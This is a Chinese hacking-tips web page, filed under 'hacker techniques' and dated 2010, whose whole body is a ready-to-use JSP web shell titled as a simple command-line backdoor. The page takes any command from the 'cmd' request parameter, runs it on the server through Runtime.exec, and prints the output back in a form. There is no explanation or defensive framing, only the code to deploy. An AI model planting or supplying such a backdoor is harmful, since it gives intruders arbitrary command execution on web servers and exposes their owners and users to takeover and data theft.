您的位置: 飞扬精品软件园 >> 文章中心 >> 安全防线 >> 黑客技术 >> jsp简单实现命令行后门

相关文章链接

本类文章排行

最新新闻资讯

    jsp简单实现命令行后门

    jsp简单实现命令行后门


    • 阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-22

    <%@ page language="java" import="java.util.*,java.io.*,java.net.*" pageEncoding="gb2312"%>
    <%!
    public static String exec(String cmd, Writer out) throws IOException
    {
    StringBuffer sb = new StringBuffer();
    int len = 0;
    byte by[] = new byte[cmd.length() * 10];
    Process p = Runtime.getRuntime().exec(cmd);
    InputStream is = p.getInputStream();
    while((len = is.read(by)) != -1)
    {
        String str = new String(by, 0, len);
        if(out != null)
        {
          out.write(str);
          out.flush();
        }
        sb.append(str);
    }
    is.close();
    return sb.toString();
    }
    %>
    <html>
    <style>
    .love{
    border:#999999 1px solid; background-color:#EEEEEE
    }
    td,input,body {
    font-size: 13px;
    background-color: #FFFFFF;
    color: #000000;

    }
    a {
    color: #000000;
    text-decoration: underline;
    }
    </style>
    <body>
    <%
    String strcmd3 = request.getParameter("cmd");
    String strcmd2=null;
    try{
    strcmd2=exec(strcmd3,null);
    }catch(Exception ex)
    {
    ex.printStackTrace();
    }
    out.println("<form name='cmd' action='' method='post'>");
    out.println("<input type='text' class='love' name='cmd' value="+strcmd3+" size=50>");
    out.println("<input type=submit class='love' name=submit value='go'>");
    out.println("</form>");
    if(strcmd2!=null)
    {
    out.println("<textarea   name='hack' rows='20' cols='65'>"+strcmd2+"</textarea>");
    }
    %>
    </body>
    </html>


查看所有评论

网友对jsp简单实现命令行后门的评论

网名:
主题:
内容:
验证码: